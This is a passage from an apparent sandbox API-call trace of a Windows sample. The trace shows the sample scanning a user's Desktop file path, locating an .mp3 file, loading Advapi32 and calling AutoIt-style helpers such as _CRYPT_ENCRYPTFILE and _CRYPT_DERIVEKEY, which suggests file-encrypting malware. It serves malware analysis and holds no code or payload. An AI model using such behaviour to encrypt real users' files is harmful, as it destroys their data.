cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oB O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kLZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZ7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MPDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PDb_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Db_Fa.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.065] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0165.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0165.066] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0165.066] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0165.066] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0165.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0165.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0165.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0165.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0165.066] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0165.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0165.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0165.066] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0165.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0165.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0165.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0165.066] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0165.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0165.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0165.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0165.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0165.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0165.066] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0165.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0165.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0165.066] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0165.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0165.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0165.067] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28da0830, ftCreationTime.dwHighDateTime=0x1d5dc11, ftLastAccessTime.dwLowDateTime=0x8d38b190, ftLastAccessTime.dwHighDateTime=0x1d5e405, ftLastWriteTime.dwLowDateTime=0x8d38b190, ftLastWriteTime.dwHighDateTime=0x1d5e405, nFileSizeHigh=0x0, nFileSizeLow=0xda2c, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="oB O9kLZ7MPDb_Fa.mp3", cAlternateFileName="OBO9KL~1.MP3")) returned 0x90ae18 [0165.067] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0165.067] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0165.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0165.067] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0165.067] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0165.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0165.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0165.067] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0165.067] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0165.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0165.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0165.067] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0165.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0165.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0165.067] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0165.068] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0165.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0165.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0165.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0165.068] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0165.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0165.068] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0165.068] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0165.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0165.068] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0165.068] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0165.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0165.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0165.068] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0165.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0165.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0165.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0165.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0165.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0165.068] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.068] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0165.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0165.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0165.068] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0165.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0165.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0165.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0165.069] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0165.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0165.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0165.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0165.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0165.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0165.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0165.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0165.070] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0165.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0165.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0165.070] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0165.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0165.070] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0165.070] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0165.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0165.070] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0165.070] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.070] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.070] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0165.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0165.070] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0165.070] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0165.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0165.070] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0165.070] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0165.071] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0165.071] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0165.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0165.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0165.071] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0165.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0165.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0165.071] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0165.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0165.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0165.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0165.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0165.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0165.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0165.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0165.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0165.071] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0165.071] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0165.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0165.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0165.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0165.071] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0165.071] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0165.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0165.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0165.071] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0165.071] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0165.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0165.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0165.072] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0165.072] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0165.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0165.072] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0165.072] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0165.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0165.072] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0165.072] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0165.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0165.072] RtlAllocateHeap (HeapHandle=0x8a0000, 